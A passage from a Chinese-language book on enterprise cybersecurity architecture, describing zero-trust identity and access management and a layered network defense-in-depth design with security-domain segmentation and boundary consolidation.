网络中自始至终存在外部或内部威胁; ● 网络的位置不足以决定网络的可信程度; ● 所有的设备、用户和网络流量都应当经过认证和授权; ● 安全策略必须是动态的,并以尽可能多的数据源计算为基础。 简而言之,在零信任网络中,默认情况下不应该信任网络内部和外部的任何人、设备、系统,需要基于认证和授权重构访问控制的信任基础。零信任对访问控制进行了范式上的颠覆,其本质是以身份为基础的动态可信访问控制,如图5.2所示。 图5.2 基于零信任架构的访问控制 基于零信任架构的访问控制以及权限最小化原则,将网络防御的边界缩小到单个或更小的资源组,不是根据物理或网络位置对系统授予完全可信的权限,而是只有当资源需要的时候才授予对数据资源的访问权限,还需要在连接建立之前进行认证,并能够持续、动态地依据主体及其环境风险的评估结果,授予主体用于访问客体的合适权限。 零信任架构关注于保护资源,是在网络与网络分段得到保护的基础上,进一步围绕人员和数据加强防控控制,确保各类业务资源得到充分的防护。为了减少不确定性,零信任在网络认证机制中减少时间延迟的同时更加关注认证、授权以及可信域设置,访问规则被限制为最小权限。 5.2.2 设计思想 1.以身份为基础 夯实基础设施及应用的安全防护,进一步强化以身份为中心的访问控制体系。通过聚合人员、设备、程序等主体的数字身份,为动态访问控制提供基于由身份数据驱动的访问决策支撑,为身份分析平台提供身份大数据所依赖的身份、权限和属性数据。 2.最小权限控制 遵循最小化权限原则,为访问主体按需设定最小权限。通过构建保护面来实现对攻击面的收缩,默认隐藏所有业务,开放最小权限,所有的业务访问请求都应该进行全流量加密和强制授权,并针对要保护的核心业务资产(如应用、服务、接口等)构建安全访问屏障。 3.持续信任评估 以身份大数据为支撑,通过信任评估引擎,实现基于身份的信任评估能力,同时对访问的上下文环境进行风险判定,对访问请求进行异常行为识别并对信任评估结果进行调整。持续信任评估为身份基础设施提供策略驱动的自动化治理能力,为动态访问控制平台提供信任评估结果,并将其作为动态权限判定的依据。 4.动态访问控制 动态访问控制是零信任架构的安全闭环能力的重要体现。它通过RBAC和ABAC的组合授权实现灵活的访问控制基线,基于信任等级实现分级的业务访问,当访问上下文和环境存在风险时,需要对访问权限进行实时干预并评估是否对访问主体的信任进行降级。动态访问控制能力依据身份基础设施和身份分析能力,为全场景业务的安全访问提供能力支撑,是全场景业务安全访问的策略判定点。 以访问者的岗位、访问者需要开展的业务需求为基础,开放其完成任务所需要的最小权限。实时感知访问风险并对权限进行动态调整,实现风险闭环对应的动态最小权限。在全业务场景中部署策略控制点,确保动态最小权限策略不被绕过。 实施动态最小权限的依据是访问的上下文场景信息,需要汇聚身份、权限、行为、风险等数据,根据多维度的数据和属性进行分析研判,决定能赋予访问者的权限。 5.2.3 总体架构 新一代身份安全总体架构由多个组成部分构成,分别是身份管理与访问控制平台、动态的零信任访问控制、自动化身份管理与流程,以及本领域与云、网、端、数据等其他领域安全功能的集成。各部分的能力相互支撑,融为一个整体。整个体系的运行以身份安全规范及细则为准则,通过构建技术平台来支撑业务运营与安全保障。 企业以身份管理与访问控制平台作为技术支撑,通过建立常态化运行机制,持续开展身份及权限数据分析,以发现违规情况与异常行为,降低IT与业务风险。以身份大数据来有效支撑部署到所有工程与任务的“零信任架构”访问控制组件,通过与各领域的深度结合和全面覆盖,实现精细化的动态访问控制能力。身份管理与访问控制体系的总体架构如图5.3所示。 图5.3 身份管理与访问控制体系 1.数字化身份管理与分析 依托身份管理与访问控制平台对数字世界的身份和权限进行管理,聚合多维身份数据、属性数据、权限数据、资源数据,形成统一的身份视图,并在管理基础上基于身份管理规则、规范来实现有序治理。重点关注身份生命周期管理、资产属性管理、访问申请、访问审批、访问评估等治理能力。身份管理与治理平台为动态访问控制平台提供访问所需要的基础数据,主要是身份、权限和属性数据,这些数据同时需要汇聚到身份分析平台的身份大数据系统,形成统一的身份视图,供后续分析所用。 2.基于零信任的动态访问控制 基于零信任的动态访问控制平台是新一代身份安全体系的重点,它通过自适应多因子认证、动态授权等核心能力,对全网的所有访问请求进行强制身份认证、细粒度授权,确保只有合法的用户、合规的终端才能访问企业机构的业务资产。动态访问控制平台需要与业务进行聚合,实现全场景的业务安全访问,包括用户访问应用、API调用、数据交换、特权运维等主要场景,且能针对不同的场景需要求来提供不同的访问代理对访问请求进行强制授权和流量加密。另外,对于应用功能、数据、云平台、基础平台内部等场景的访问控制,需要将安全和业务同步规划,确保在业务设计之初就考虑到零信任动态访问控制能力和业务逻辑之间的聚合方案。 3.自动化身份管理与流程 面向系统开放服务和接口,与工单、HR、运维管理等IT系统形成联动,形成身份安全运行流程,实现多层级、流程化的身份与权限生命周期安全管理,以自动化流程方式提升管理效率。 4.零信任访问控制对企业级IT各领域的全面覆盖 新一代身份安全体系中的零信任架构访问控制,要与其他安全工程紧密结合。随着各项IT工程的建设,需要把零信任访问控制的组件全面深入部署到各工程建设的系统中,这些控制组件与身份管理通过集成适配,融合为一个整体。企业基于身份大数据对身份数据、操作行为、异常权限等进行分析,并通过分析结果有效支撑部署到所有工程与任务的“零信任架构”访问控制组件来执行管控动作,从而实现精细化的动态访问控制。 5.与其他安全系统的协同联动 身份安全要与多个其他安全系统集成,协同联动。与用户及实体行为分析(UEBA)集成,支撑对异常行为的发现与处置;建立面向应用系统的分布式用户访问控制体系,形成数字身份细颗粒度访问控制的全面覆盖;集成态势感知平台,开放身份与行为数据查询与响应控制接口,实现安全运营的协同;集成系统安全平台,实现资产属性信息的聚合;集成多因素身份认证(MFA)因子,支撑高强度身份认证。 5.2.4 关键技术 1.全面泛化的数字化身份管理 ● 身份管理 身份管理提供对访问主体全面身份化的能力,用户、设备、应用、服务等自然实体都必须在可信的身份平台中注册并形成数字化身份。并可对这些身份按照角色、组织、办公场所等属性进行多维度分类,为各类身份创建或关联适宜的身份生命周期管理流程,实现身份归一化管理。 ● 权限管理 权限管理可支撑访问控制的相互协作,共同完成访问主体到应用与数据的安全访问。权限管理提供访问主体权限信息(用户、属性、权限、应用)、策略配置管理功能及提供自服务和工作流逻辑;维护授权相关的规则、策略、属性信息;提供外部授权信息接口和协议适配能力。 ● 账号管理 集中的账号管理包含对所有终端设备、服务器、网络设备、应用等用户账号的集中管理。集中账号管理可以将账号与数字身份、自然人、设备和应用相关联。 ● 资源管理 资源类型包括应用、接口、功能、数据等,可对所有的资源进行统一注册和纳管,通过资源标签对资源的属性进行多维度管理。账号和资源的集中管理是集中授权、认证和审计的基础。 ● 身份生命周期管理 针对不同的身份类型构建不同的身份生命周期管理模型,对身份创建、变更、冻结、删除等全生命周期状态进行管理,确保身份状态与其对应的自然实体保持一致。 ● 访问申请 用户可以通过便捷的操作界面对所需的访问权限进行申请,避免因管理员逐一分配权限产生的繁琐管理成本。访问申请一般与访问审批配合使用。 ● 访问审批 用户对访问权限进行申请后,系统及相关责任人对申请进行审批。审批方式包括通过电子流程审批、短信审批等方式;审批成功后,通过短信或邮件提醒申请人申请成功或者失败。 ● 权限评估 支持对自助申请和既定权限进行风险和违规评估,为审批者和管理员提供相应风险情况的提示信息。权限评估基于用户身份模型、任务及属性情况来综合评定。 ● 自助服务 用户可以通过自助门户对身份信息、密码等进行自助管理,降低管理和运维成本。 2.数据驱动的身份大数据分析 ● 终端环境感知 通过在终端安装的插件对终端环境、运行状态、风险行为进行持续采集和分析,从而对终端健康度进行评估,将其作为持续信任评估的输入。 ● 持续信任评估 根据身份、权限、终端环境感知、访问日志等信息进行综合分析,采用大数据分析和人工智能技术,对发起访问请求的人员和终端进行综合评估,计算信任等级,以支撑动态访问控制平台实现动态权限的调整。 ● 风险策略编排 汇聚来自外部威胁检测平台等的风险事件输入,基于策略进行编排并在策略评估满足时,对动态访问控制平台、身份基础设施及其他联动的安全产品下发控制指令。 ● 身份可视化 基于身份大数据进行分析并以可视化的方式呈现,可对全平台的身份、权限、访问、风险信息进行直观展现。 ● 身份大数据管理 将与身份相关的数据进行集中化的管理和维护,包括地区、使用行为、应用资源等,并基于大数据技术自动化分析与身份相关的数据。可分析用户的地域分布,提供区域热点及城市热点分析;分析用户系统环境、应用访问流量、认证偏好、访客属性及用户活跃度、访问频次和访问时长等有价值的信息,协助用户进行持续的风险信任评估。 ● 行为分析 基于全网访问行为进行基于身份的关联并构建访问行为基线,对偏离基线的行为进行告警;通过风险策略编排,最后影响访问者的信任等级。 ● 账号分析 对身份基础设施的身份库信息进行分析,发现孤儿账号、僵尸账号等异常数据;通过与身份基础设施之间的联动,可自动对异常账号数据进行冻结或删除。 ● 权限分析 基于对等组分析等模型,对身份基础设施的权限库进行挖掘分析,若发现不符合最小权限的原则,或违背职责分离原则的权限,则进行自动调整。 3.基于零信任架构的动态访问控制 基于零信任架构的动态访问控制架构如图5.4所示。 图5.4 基于零信任架构的动态访问控制架构 ● 自适应多因子认证 提供用户名密码、动态口令、二维码、推送等认证能力,也可与外部的人脸、声纹等多因子认证能力结合,提供符合“所知、所持、所有”的多因子认证机制。可配置自适应规则,使其根据认证请求上下文、风险信息动态调整认证因子的组合。 ● 动态权限调整 采用RBAC和ABAC结合的授权方式,既兼顾RBAC的简单、明确的特性,也具备ABAC的灵活性,以实现基于主体属性、客体属性、环境风险等因素的动态授权。支持与身份分析联动,接收动态的信任评估结果,实时动态地对权限进行调整。 ● 身份联邦 能够支持应用资源跨域漫游访问,实现联邦登录认证。所遵循的技术标准包括OAuth、CAS、SAML等。 ● 特权访问 为了加强对特权用户和特权访问行为的管理,支持在逻辑上把特权用户、特殊权限和普通权限、普通用户区分开,对应用的访问采用更加严格的特权访问控制机制。针对特权用户和特权访问,支持特权访问策略管理、特权用户发现与梳理、特权密码保护、特权操作提权、特权会话记录、监控和特权威胁分析等特权管理功能。 ● 外部授权 提供外部授权信息接口和协议适配能力,支持为应用、数据、平台提供授权能力,实现全场景的集中授权能力。 4.全场景业务安全访问控制 ● 应用代理 应用代理可将代理的应用默认隐藏在代理网关后,并在代理后进行集中授权,同时可支持令牌传递,实现单点登录。应用代理可支持HTTP、RDP、SSH、E-mail等多种传输协议的代理,同时针对传统的应用提供基于TCP和IP的隧道接入能力。应用代理受动态访问控制平台的集中权限控制。 ● API代理 API代理可将代理的API服务默认隐藏在代理网关后,然后对API调用进行接管并集中强制动态授权,同时通过令牌传递技术,可实现应用级+用户级的双重身份认证。API可支持基于标准RESTful接口的API调用和基于Web Service的API调用。API代理受动态访问控制平台的集中权限控制。 ● 运维代理 运维代理可将代理的运维资产默认隐藏在代理网关后,然后对运维操作进行细粒度的指令集访问控制,同时支持对运维操作进行录像和回放。运维代理受动态访问控制平台的集中权限控制。 5.2.5 预期成效 ● 全面身份化 为人、设备、应用都赋予数字身份,访问控制策略基于身份制定,建设以身份为基石的细粒度访问控制机制。 ● 授权动态化 权限不再是静态制定的,而是基于持续的风险度量和信任评估,动态调整访问权限,实现动态访问授权。 ● 风险度量化 采用大数据分析和人工智能技术对用户、设备、环境属性等访问上下文进行感知和建模,实现风险和信任的持续度量。 ● 管理自动化 借助策略分析和工作流引擎等机制,实现策略的自动优化分析和管理流程的自动化,提升管理运维效率,规避管理人为犯错。 5.3 新一代身份安全建设要点 5.3.1 建设要点 在数字化时代,身份安全对保障业务安全有序运转起到重要作用。政企可以将身份安全定位为信息化和网络安全的双基础设施,采用基于数据驱动的身份管理模式,结合零信任架构的访问控制技术路线,建设身份管理与访问控制平台。新一代身份安全的建设需要规划先行,然后需要结合业务的安全愿景与现状,分解建设任务并逐步建设,建设要点如下。 ● 建设身份管理与访问控制平台,承载统一的数字身份视图,实现身份管理、账号管理、权限管理、资源管理等功能,覆盖人员、设备、应用等各类实体的数字身份及其权限管理。 ● 聚合人员、设备、程序等主体的数字身份、认证因子等数据和IT服务资源属性、环境属性、数据资源安全属性等数据,结合访问控制策略数据,形成企业级的统一身份视图,实现人员、设备、接口、应用的全面身份化。 ● 开展身份数据与权限数据分析,提升数据的质量。发现越权、滥用权限等异常行为,以及违反业务规程、保密要求、内控要求的各种违规类操作。以身份大数据支撑遍及所有工程中的“零信任”访问控制组件,为动态、精细化的访问控制奠定数据基础。 ● 建设统一认证门户,集成PKI基础设施及多因子认证技术,为应用、系统提供统一的多因子认证和单点登录能力。 ● 开发、集成密码服务套件,实现对数字身份、凭证和关键系统信息的加密存储。 ● 以“零信任”的模式将API访问控制、运维访问控制、远程接入控制等访问控制组件部署到所有工程中,通过动态访问控制策略引擎向部署到各工程中的访问控制组件和集成在IT服务内部的策略执行组件下发动作指令,实现基于“零信任”的动态、精细化的访问控制能力。 ● 建立信任评估模型,基于信任评估结果形成用户访问控制策略。通过将策略推送至访问控制平台或IT服务内策略执行点的方式,实现基于风险评估的动态的访问控制。利用身份大数据,采用机器学习算法对访问主体进行信任评估。 ● 针对云、大数据平台、应用系统的内部服务与资源,建立基于资源属性的数字身份统一授权管控策略,强化系统运维、权限变更等特权操作管控,实现全场景人机交互、系统间互访的统一授权管理,以及基于零信任的细颗粒度访问控制。 ● 建设零信任业务访问控制平台,与云平台、大数据平台、物联网平台、开放API平台、容器编排等IT基础设施内置的策略执行点实现聚合,提供动态访问控制能力。 ● 建设零信任特权访问控制平台,覆盖运维、DevOps、云运维等场景,实现基于零信任的动态特权访问管理。 ● 与特权管理系统集成,强化对系统运维、系统变更、账号创建等特权操作的管控。 ● 与内部威胁管控平台集成,通过用户及实体行为分析(UEBA)来支撑对业务异常行为的发现与处置;建立面向应用系统的分布式用户访问控制体系,并与大数据、云计算等IT服务中的访问控制策略执行点结合,形成数字身份细颗粒度访问控制的全面覆盖。 ● 针对态势感知平台,开放身份与行为数据查询与响应控制接口,实现安全运营的协同。通过态势感知向云、大数据平台、应用等分布式执行点推送策略,实现风险的自动化处置能力。 ● 针对流程管理和运维工单等系统开放集成服务,实现多层级、流程化的身份与权限生命周期安全管理;集成多因子身份认证(MFA)方法,支撑高强度身份认证。 ● 构建基于分析的身份治理能力,梳理和建设身份治理流程,以支撑身份生命周期管理、用户访问申请以及实现流程自动化。开通账号注册与权限申请自助服务,支撑用户以自助服务的方式注册账号并申请权限,以自动化的流程方式提升效率。 ● 通过访问权限评估、策略分析与治理,并依托身份大数据平台和身份分析技术对身份、账号、权限进行异常分析,确保身份与权限合规。 ● 与内部威胁管理平台、安全运行平台、终端安全平台等实现联动,针对风险事件执行身份与访问相关的风险响应策略。 ● 建设身份安全开放平台,与工单、HR、运维管理等IT系统集成联动,形成身份安全运行流程,提升管理效率,优化运行效果;与态势感知及安全运营平台集成,提供身份与行为数据的动态查询和集中运营,实现管理与运营的自动化。 ● 制定身份安全管理办法和实施细则,加强身份安全教育,为身份安全的集成及优化提供依据和指导。 最后,务必牢记新一代身份安全体系极强的内生安全属性,必须结合业务场景,从架构视野出发进行规划和建设,切记不可盲目地进行产品堆砌。 5.3.2 关注重点 身份安全领域作为信息化和安全运营的双基础设施,其能力覆盖企业信息化建设的方方面面。在建设中必须以体系化思维进行规划,避免出现由于缺乏体系性、前瞻性、科学性而导致的能力缺失、效能低下等问题,因此必须重点关注以下内容,确保身份安全能力得到有效构建。 ● 要在满足企业现有的管理流程的基础上实现管理提升,身份管理与访问控制平台需要根据企业的实际需求进行量身定制。身份管理团队在平台建设的同时,还需要协助安全管理部门制定企业自身的身份及账号管理规范等制度标准。 ● 身份管理团队需要与业务部门进行更紧密的沟通协调,同时使业务部门和IT团队尽早参与到系统的建设过程中并深入评估对IAM(身份访问与管理)的需求。与业务系统的沟通内容包括系统集成工作全流程,如管理需求确认、流程设计、数据梳理、集成测试联调和上线切换,避免由于性能瓶颈、区域自建或者网络隔离需求导致“烟囱式”的IAM建设。 第6章 重构企业级网络纵深防御 6.1 数字化转型与业务发展的新要求 6.1.1 新技术新业务发展挑战 数字化转型带来的新技术的应用和新业务的发展,驱动着企业网络进一步升级演进,网络环境变得更加复杂与开放,给网络安全防御提出了更高的要求。 ● 互联网接入风险增加 新兴的数字化业务大多通过互联网来落地实现,更多的合作伙伴通过互联网进行数据交互,移动生产、远程办公、IT外包厂商等通过互联网接入企业内部网络的情况将更加频繁。企业更依赖于互联网开展业务,这在开放的同时可能引入更多的安全威胁,使得企业网络的互联网接入风险日趋严重。 ● 网络出口边界增多 工业生产网、物联网、混合云、卫星通信等技术的应用,带来了更多类型的网络出口,传统的网络间物理隔离的方式被逐渐打破,企业网络边界变得更加模糊,网络外延空间更广,这给边界安全防护措施的部署、安全策略的设计实施带来了更大的挑战。 ● 广域网结构复杂 随着企业的业务发展,IT基础设施向更广泛的区域延伸。企业广域网运用更多的方式组网,大量分支机构通过多种方式接入企业网络,使得广域网结构更加复杂,接入边界激增且业务访问关系交错。安全威胁进入企业网络后,通过广域网在企业内部的传播范围更广,影响范围更大。 6.1.2 企业面临更复杂的网络环境 当前国家间的网络环境渐趋复杂,网络黑色产业持续活跃,出于政治目的、经济利益发起的有组织的网络攻击行动持续高发,其规模性、破坏性急剧上升。恶意组织通过体系化的攻击,反复进行渗透和横向扩展,给企业造成大面积服务中断、系统破坏、敲诈勒索、敏感数据泄露等危害。因此面对体系化的进攻,需要构建体系化的网络纵深防御机制,降低有组织网络攻击的成功可能性。 6.1.3 传统的网络纵深防御机制问题 传统的网络纵深防御机制,在网络结构、防御纵深、部署方式和运维管理方面存在较多问题和不足。 ● 网络结构安全缺陷 网络安全域的划分较为粗放,缺乏进一步的内部细分及隔离措施,网络攻击面广,恶意入侵者突破网络边界后,可以在安全域内大范围横向移动,造成更大的破坏影响。而企业未从全网角度统筹进行网络边界的整合,同类型的网络边界各自独立防护,安全防护能力不一致,安全建设投资大。网络业务平面与管理平面未分离,无法充分保障管理通道资源的可用性,对资产自身的安全防护和运维管控能力较弱。 ● 网络边界防御纵深不足 网络边界安全防护措施部署不完善,未全面覆盖边界的各种访问连接场景,无法满足最新的《信息安全技术 网络安全等级保护基本要求》《关键信息基础设施安全保护条例》等合规管控要求,存在安全检测和防护的盲区。同时网络边界防御缺乏纵深,在第一层边界突破后,缺乏有效的第二层边界措施,无法形成真正的防御策略,难以抵御高级持续性威胁的攻击。 ● 广域网防御纵深不足 广域网汇聚节点缺乏安全防护措施,网络攻击面极广,分支机构到总部、分支机构间可以任意访问;无法在广域网层检测网络威胁的活动情况,为全局态势感知提供数据支撑;无法在广域网层遏制网络威胁的传播行为,全局限制网络威胁的影响范围。 ● 部署方式不灵活 传统的网络安全防护设备以专用硬件为主,通常以“葫芦串”的方式在网络边界上部署,存在较多问题和不足。例如,网络的高可用性结构设计容易被破坏,网络节点故障隐患多;随着链路带宽的增加,扩容成本随之增加,只能升级替换原有设备,无法弹性扩展安全能力;无法按需编排调度网络流量,安全能力部署不灵活,实施难度大。 ● 运行管理效率低 全网大量的网络安全设备缺乏统一的运行管理措施,无法实现统一的资产管理、安全策略控制;运行管理自动化的程度不高,无法规避人为误操作风险,整体效率较低。 因此传统的网络纵深防御机制,无法适应企业数字化转型中新技术应用和新业务发展的要求,无法抵御愈加严峻的有组织的体系化攻击,需要体系化重构企业级网络纵深防御机制,支撑企业的数字化转型战略。 6.2 如何重构企业级网络纵深防御 6.2.1 基本概念 企业级网络纵深防御是结合企业网络基础设施的现代化改造,基于面向失效的设计和能力导向的设计的总体思想,通过网络流量可视化、网络隔离细粒度化、场景覆盖全面化、网络防御纵深化、安全集群标准化、策略管理自动化等关键技术,采用集约化模式来构建多层次、协同联动的网络纵深防御体系。 6.2.2 设计思想 1.面向失效的设计 面向失效的设计是网络纵深防御的核心思想。在一层防护措施失效的情况下,仍然有下一层的防护措施保障;下一层措施失效后还有补救措施。通过在网络区域空间上多层级有针对性地部署防护措施,构建协同联动的防御体系,可规避局部失效对网络的影响,从失效中快速恢复。 2.能力导向的设计 针对网络各边界节点的业务访问模式,采用标准化的网络纵深防御能力框架,有针对性地设计各类网络服务及通用安全能力,分析当前网络安全能力的差距,指导网络安全措施的建设部署,保障业务访问安全,满足合规管控要求。 6.2.3 总体架构 企业级网络纵深防御体系的总体架构主要包括以下几个部分(见图6.1)。 图6.1 企业级网络纵深防御体系架构图 ● 网络结构安全 以网络结构安全为基础,通过开展网络安全域划分、网络边界整合、管理网络建设等基础工作,来提高网络结构的安全性。 ● 网络边界纵深防御 以网络边界纵深防御为核心,完善网络边界纵深防御体系,针对网络不同访问场景,实现安全能力的全面覆盖、深度结合。 ● 广域网纵深防御 以广域网纵深防御为突破,在广域网汇聚层部署节点,增加广域网防御纵深,构建协同联动的多层防线,提升广域网的全局控制能力。 ● 安全防护集群 以安全防护集群为依托,设计标准化、模块化的网络安全防护集群,提供按需灵活编排调度、弹性扩展的安全能力,分别部署于网络各节点。 ● 运行管理 以运行管理为支撑,开展统一运行管理,覆盖网络各节点的安全防护集群,实现全局安全策略管理、运行状态监控及运维安全管控。 6.2.4 关键技术 ● 网络流量可视化 网络流量可视化是支撑网络纵深防御的重要基础。看得清流量,方能识得准威胁,部得全能力,配得严策略,挡得住风险;通过在网络各节点部署流量分析措施,可实现全局网络流量数据的捕获、解密、处理和按需输出,统一支撑网络资产发现、网络安全威胁分析、网络行为审计、数据泄露检测等工作的开展。 ● 网络隔离细粒度化 全面梳理网络中的资产,根据资产暴露位置、业务功能、重要等级等属性,进行网络安全域的细粒度划分,实现功能组、工作负载级的网络隔离;并在网络区域边界上实施严格的隔离防护措施,实现网络访问权限的最小化,收缩网络攻击面,限制安全威胁的影响范围。 ● 场景覆盖全面化 梳理网络边界的各种访问连接模式,针对每种模式的不同场景设计网络安全能力。同时整合相同/相似连接类型的网络边界,收敛应用服务及接口的协议类型,统筹部署网络安全防护能力,全面覆盖网络边界的主要安全防护需求。 ● 网络防御纵深化 增加网络防御纵深,多层级部署防护措施,形成异构、协同联动的防护机制。在一层防护措施失效情况下,仍然有下一层的防护措施保障,充分保障关键资产的安全。同时在每个层级上严格实施网络访问控制策略,收缩网络攻击面,减少横向移动的范围。 ● 安全集群标准化 设计标准化、模块化的网络安全防护集群,部署于网络各节点,以适配本节点的安全防护需求。实现安全服务链的灵活编排,支撑安全能力的弹性扩展,适应复杂网络的组网环境。 ● 策略管理自动化 统一管理网络各节点的标准化安全防护集群,并通过北向接口的适配或改造,集中纳管已有的网络安全资源,实现网络安全防护策略的全局控制。汇聚安全告警、网络流量、安全情报等信息,进行关联分析、智能推理、研判和决策,形成安全防护策略,并自动装配、下发执行,实现全局协同防护和联动。 6.2.5 预期成效 ● 全局可管 通过网络纵深防御建设,整合网络安全资源,实现全局网络安全能力的统一管理,保障全局网络安全防护策略的一致性,形成全局协同防护和联动响应机制,同时可以为态势感知提供全局网络数据支撑。 ● 合规可达 通过网络纵深防御建设,落实国家网络安全政策,强化企业网络安全合规管控要求,消除合规性风险。在网络和通信安全领域,全面达到网络安全等级保护、关键信息基础设施安全保护、信息系统密码应用等相关合规要求。 ● 风险可控 通过网络纵深防御建设,能够抵挡来自外部有组织的团体、拥有丰富资源的威胁源发起的恶意网络攻击,能够及时发现、检测网络攻击行为和处置网络安全事件,快速恢复大部分网络功能,充分保障企业网络安全有序运转。 6.3 重构企业级网络纵深防御的方法与要点 6.3.1 总体流程 重构企业级网络纵深防御的总体流程如图6.2所示,具体包括以下内容。 1.资产识别 识别网络资产属性,梳理资产的访问关系,为网络结构安全和纵深防御设计提供重要信息支撑。 2.网络结构安全设计 以资产属性为基础开展网络安全域划分,并针对相同类型的边界进行整合,按需开展管理网络建设。 图6.2 企业级网络纵深防御的总体流程 3.网络纵深防御设计 综合网络结构、资产访问关系等要素,设计网络各节点纵深防御安全能力,包括网络边界纵深防御和广域网纵深防御两部分。 4.安全措施部署 根据网络各节点的纵深防御安全能力要求,分别设计各网络安全防护集群的安全措施组合及部署方式。 5.运行管理 针对全网的安全防护集群,开展安全策略管理、运行状态监控和运维管控等运行管理工作的统一设计。 6.3.2 资产识别 ● 资产属性识别 识别被保护资产的详细属性信息,将其作为网络安全域划分的重要信息输入。具体属性包括资产名称、资产类别、资产功能、所属系统、重要程度、部署位置、归口管理等。识别方式包括资产管理系统、人工访谈等。 ● 访问关系梳理 梳理被保护资产的访问关系信息,将其作为网络纵深防御设计时安全能力设计的重要信息输入。访问关系包括用户业务访问、运维管理访问、系统内交互、系统间交互等。梳理方式包括网络流量分析、人工访谈等。 6.3.3 网络结构安全设计 1.网络安全域划分 安全域是网络中具有相同的暴露位置、安全威胁、功能架构、信任范围的资产组合。同一安全域内的资产将作为一个整体来处理,它们相互信任,共用安全防护措施。安全域划分就是从安全角度将网络资产划分成不同的区域,开展针对性的隔离防护,收缩网络攻击面,限制网络威胁的影响范围,避免牵一发而动全身。 ● 划分原则 安全域的划分应综合资产属性、应用系统架构、网络架构、云平台架构、企业管理模式等信息。通常情况下,安全域划分越精细,安全隔离防护成效越好,但相应的安全建设投资和运行管理工作量也会越大。安全等级越高的系统,其安全域划分应越精细,以充分保障重要系统的安全。 ● 划分方法 可以按需实施“安全域——安全子域——功能组”的多级划分,如图6.3所示。 ▷ 安全域:根据资产在网络中的暴露位置、信息系统的类别等,进行域级划分,例如DMZ、应用、数据、开发测试、管理等域。 ▷ 安全子域:在同一个域内,根据资产所属的信息系统进行子域级划分。例如DMZ域可以进一步划分为办公服务、合作伙伴服务、公共服务等子域。 ▷ 功能组:在同一个子域内,根据资产在系统中的功能定位进行功能组级的安全域划分。例如DMZ公共服务子域可以进一步划分为信息发布、会员、商城等功能组。 图6.3 安全域划分方法 ● 应用分层架构 从安全角度出发,建议将常见的B/S(浏览器/服务器)架构应用划分为界面层、业务逻辑层、数据访问层和数据服务层,每一层划归入一类安全域,实施域间隔离防护,如图6.4所示。 图6.4 应用分层架构 ● 网络微隔离 在云平台环境中,在划分“安全域——安全子域——功能组”的基础上,可以以虚拟机、容器等工作负载为单位进一步划分,进行网络微隔离,实现网络信任域的最小化,全面降低东西向的横向穿透风险。 2.网络边界整合 在安全域划分的基础上,识别梳理网络各处边界的连接模式,在保障业务正常访问的前提下,整合同类型的网络边界,减少网络互联接口的数量,形成统一的安全控制点,集中部署网络安全防护措施,实现网络安全能力的集中覆盖,减少总体安全建设投资,达到“一夫当关,万夫莫开”的管控成效。 ● 整合原则 从企业角度综合考虑网络边界类型、业务影响、网络改造难度、安全建设投入、企业管理模式等因素,统筹开展网络边界整合工作。针对高风险边界,例如互联网服务接入、互联网办公出口、外部网络接入、管理网络入口等,优先开展网络边界整合整改工作,集中安全能力。 ● 整合方法 根据网络边界类型分别实施“总部——区域——分支机构”边界整合,如图6.5所示。 ▷ 总部边界整合:全企业整合在总部的边界,包括互联网接入(互联网用户访问、远程办公接入、IT承包商接入、基于互联网的合作伙伴接入等)、外部网络(合作伙伴、主管部门等外部专线)、公有云接入等。总部边界整合包括互联网办公出口、终端接入、跨网访问(企业内部生产网、办公网等不同网络间的边界)、总部级数据中心等。 ▷ 区域边界整合:全区域整合在区域中心的边界,包括互联网办公出口边界。区域边界整合包括终端接入、跨网访问、区域级数据中心边界等。 图6.5 网络边界整合方法 ▷ 分支机构边界整合:在分支机构内主要实施终端接入边界整合。 3.管理网络建设 通过建设独立的管理网络,实现业务平面与管理平面的分离,可以充分保障管理通道资源的可用性,使得在业务网络发生故障、链路拥塞等情况下,仍然能通过专用管理网络开展管理工作;可以增强资产、管理系统自身的安全防护,避免其暴露在业务平面中,减少被攻击利用的可能。 ● 建设原则 应汇总网络、安全、云平台、应用等管理需求,结合网络安全域划分及边界整合工作,综合网络改造难度、安全建设投入、企业管理模式等因素,统筹开展企业各级网络的管理网络建设。 ● 建设方法 在总部及区域中心建设独立的管理网络。 ▷ 通过专用的交换机,连接网络设备、安全设备、物理主机、虚拟主机等资产的管理接口,组成独立的管理网络。 ▷ 根据资产管理接口模式,进一步划分为带外管理子域和带内管理子域,两个管理子域间实施隔离防护。 ▷ 在管理网络上划分管理系统相关子域,分别部署网络管理、安全管理、云平台管理、应用管理等系统。 ▷ 整合管理访问入口,集中部署身份与访问管理、运维安全代理、特权账号管理等系统,实现运维安全管控。 ▷ 配合管理网络的建设,建设管理终端接入子域,与办公、生产等终端接入子域进行物理隔离,管理终端接入子域则通过专用链路接入管理网络。 6.3.4 网络纵深防御设计 在网络安全域划分及边界整合的基础上,设计网络各边界节点的安全能力,构建网络防御纵深。 1.网络安全能力框架 基于安全识别、防护、检测、响应和恢复类的基础安全能力,针对不同业务访问场景的安全防护及合规管控需求,组合成各类网络服务及通用安全功能组,形成标准化的网络纵深防御安全能力框架,支撑网络各边界节点的安全能力设计(见图6.6)。 2.网络安全能力设计 将资产识别中的访问关系梳理结果映射到网络拓扑结构中,形成网络各边界节点的业务访问场景。针对不同的业务访问场景,依据网络安全能力框架设计相应的安全能力,形成本边界节点的网络安全能力集合。表6.1列举了企业网络中典型边界的安全能力配置。 图6.6 网络纵深防御安全能力框架 表6.1 典型边界的安全能力 续表 续表 3.网络安全能力差距分析 识别当前网络各边界节点的安全能力现状,对照上述相应的网络安全能力设计,分析当前网络各边界节点的安全能力差距,指导网络安全防护措施的选择与部署。 4.网络边界防御纵深构建 结合应用系统的分层架构设计,将应用组件划分到不同网络安全域。在各层安全域的边界上,针对不同的业务访问场景,依据网络安全能力框架设计相应的安全能力,部署网络安全防护措施,形成攻击路径上的层层防线。实现网络边界多层纵深防御,全面收缩应用系统攻击面,避免因应用系统某一个组件的失陷,造成整个应用系统被入侵控制,减少敏感数据泄露的可能性。网络边界防御的整体架构如图6.7所示。 图6.7 网络边界防御纵深架构 ● 措施异构 不同防线上的同类安全措施在工作机制(如黑/白名单)、检测方式(如特征匹配、全流量分析)、品牌等维度上实现异构,避免攻击者利用相同的手段穿透所有防线。 ● 协同联动 整合不同防线上的安全措施,实现安全策略的统筹部署(如黑白结合、粗细结合)、安全数据的整合分析(如态势感知)、安全事件的联动响应(如SOAR)。 5.广域网防御纵深构建 